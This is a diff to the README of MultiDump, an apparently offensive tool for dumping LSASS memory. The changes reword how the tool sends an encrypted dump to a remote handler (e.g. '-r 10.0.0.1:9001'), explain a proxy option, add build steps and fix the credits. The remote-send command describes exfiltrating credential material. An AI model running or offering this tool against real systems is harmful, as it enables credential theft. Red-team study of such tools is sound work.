Xre0uS/MultiDump/README.md

 MultiDump.exe -r 10.0.0.1:9001
 ```

-The key is encrypted by the handler's IP and port.
-When MultiDump connects through a proxy, the handler should use the `--override-ip` option to align the IP address with the `-r` option specified in MultiDump, ensuring decryption works correctly by matching the decryption IP with the expected IP.
+The key is encrypted with the handler's IP and port.
+When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.

+### Building MultiDump

+Open in Visual Studio, build in **Release** mode.

 ### Credits

-- Some techniques used learnt from [MalDev Academey](https://maldevacademy.com)
+- Some techniques used learnt from [MalDev Academy](https://maldevacademy.com)
 - Inspired by [proc_noprocdump](https://github.com/djackreuter/proc_noprocdump)
 - Code to further process LSASS dump from [lsassy](https://github.com/Hackndo/lsassy)
 - Testing and suggestions from [ballro](https://github.com/ballro)